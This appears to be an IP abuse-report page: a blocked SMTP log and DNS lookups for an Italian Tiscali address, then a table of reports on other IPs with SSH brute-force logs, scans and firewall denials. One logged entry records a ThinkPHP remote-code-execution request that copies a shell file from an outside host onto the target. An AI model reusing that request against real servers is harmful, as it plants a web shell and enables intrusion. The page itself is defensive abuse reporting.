City: unknown
Region: unknown
Country: Italy
Internet Service Provider: Tiscali Italia S.p.A.
Hostname: unknown
Organization: unknown
Usage Type: Fixed Line ISP
| Type | Details | Datetime |
|---|---|---|
| attackspam | 2019-01-19 18:13:07 1gkuB8-0006uc-4a SMTP connection from 94-39-81-216.adsl-ull.clienti.tiscali.it \[94.39.81.216\]:10911 I=\[193.107.88.166\]:25 closed by DROP in ACL 2019-01-19 18:13:20 1gkuBL-0006ur-73 SMTP connection from 94-39-81-216.adsl-ull.clienti.tiscali.it \[94.39.81.216\]:11052 I=\[193.107.88.166\]:25 closed by DROP in ACL 2019-01-19 18:13:29 1gkuBU-0006uv-8i SMTP connection from 94-39-81-216.adsl-ull.clienti.tiscali.it \[94.39.81.216\]:11147 I=\[193.107.88.166\]:25 closed by DROP in ACL ... |
2019-10-24 21:31:02 |
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 94.39.81.216
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 58502
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;94.39.81.216. IN A
;; AUTHORITY SECTION:
. 475 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2019102400 1800 900 604800 86400
;; Query time: 134 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu Oct 24 21:30:58 CST 2019
;; MSG SIZE rcvd: 116216.81.39.94.in-addr.arpa domain name pointer 94-39-81-216.adsl-ull.clienti.tiscali.it.Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
216.81.39.94.in-addr.arpa name = 94-39-81-216.adsl-ull.clienti.tiscali.it.
Authoritative answers can be found from:| IP | Type | Details | Datetime |
|---|---|---|---|
| 193.112.90.146 | attackspambots | SSH Login Bruteforce |
2020-01-26 05:43:29 |
| 139.59.30.114 | attackspam | Unauthorized connection attempt detected from IP address 139.59.30.114 to port 2220 [J] |
2020-01-26 05:32:05 |
| 178.154.171.22 | attackspam | [Sun Jan 26 04:13:48.252957 2020] [:error] [pid 5398:tid 140685650384640] [client 178.154.171.22:61263] [client 178.154.171.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[\\\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/modsecurity/owasp-modsecurity-crs-3.2.0/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "696"] [id "920350"] [msg "Host header is a numeric IP address"] [data "103.27.207.197"] [severity "WARNING"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "103.27.207.197"] [uri "/"] [unique_id "XiyvjAjo9bDOArOFDu90uwAAAwU"] ... |
2020-01-26 05:39:20 |
| 43.251.81.90 | attackbotsspam | Honeypot attack, port: 445, PTR: PTR record not found |
2020-01-26 05:13:01 |
| 80.183.89.224 | attackbotsspam | Unauthorized connection attempt detected from IP address 80.183.89.224 to port 81 [J] |
2020-01-26 05:09:18 |
| 114.239.104.196 | attack | "GET /index.php?s=Home/\\\\think\\\\app/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][]=http://www.520yxsf.com/shell.txt&vars[1][]=libsoft.php HTTP/1.1" 404 485 "http://www.XXX.com/index.php?s=Home/\\\\think\\\\app/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][]=http://www.520yxsf.com/shell.txt&vars[1][]=libsoft.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2020-01-26 05:21:14 |
| 185.212.171.150 | attack | 0,31-04/06 [bc01/m08] PostRequest-Spammer scoring: essen |
2020-01-26 05:36:21 |
| 112.215.113.11 | attackspambots | Unauthorized connection attempt detected from IP address 112.215.113.11 to port 2220 [J] |
2020-01-26 05:06:04 |
| 128.199.170.33 | attackspam | Jan 25 22:14:03 localhost sshd\[11106\]: Invalid user ubuntu from 128.199.170.33 port 43830 Jan 25 22:14:03 localhost sshd\[11106\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=128.199.170.33 Jan 25 22:14:06 localhost sshd\[11106\]: Failed password for invalid user ubuntu from 128.199.170.33 port 43830 ssh2 |
2020-01-26 05:24:49 |
| 114.67.95.188 | attackspambots | Jan 25 22:13:50 lnxmail61 sshd[5997]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=114.67.95.188 Jan 25 22:13:50 lnxmail61 sshd[5997]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=114.67.95.188 |
2020-01-26 05:37:40 |
| 42.119.59.216 | attack | Unauthorized connection attempt detected from IP address 42.119.59.216 to port 23 [J] |
2020-01-26 05:13:26 |
| 106.13.140.138 | attackspambots | Unauthorized connection attempt detected from IP address 106.13.140.138 to port 2220 [J] |
2020-01-26 05:26:24 |
| 64.225.65.214 | attackbotsspam | Jan 25 22:13:40 raspberrypi sshd[1089]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=64.225.65.214 Jan 25 22:13:42 raspberrypi sshd[1089]: Failed password for invalid user admin from 64.225.65.214 port 50172 ssh2 ... |
2020-01-26 05:44:34 |
| 112.85.42.188 | attackbotsspam | 01/25/2020-16:36:15.023423 112.85.42.188 Protocol: 6 ET SCAN Potential SSH Scan |
2020-01-26 05:38:00 |
| 220.161.92.214 | attackspambots | 2020-01-25T22:10:50.865414ns386461 sshd\[2153\]: Invalid user ftpuser from 220.161.92.214 port 45842 2020-01-25T22:10:50.869748ns386461 sshd\[2153\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=220.161.92.214 2020-01-25T22:10:52.472800ns386461 sshd\[2153\]: Failed password for invalid user ftpuser from 220.161.92.214 port 45842 ssh2 2020-01-25T22:14:13.017406ns386461 sshd\[5428\]: Invalid user fs from 220.161.92.214 port 58808 2020-01-25T22:14:13.022041ns386461 sshd\[5428\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=220.161.92.214 ... |
2020-01-26 05:22:17 |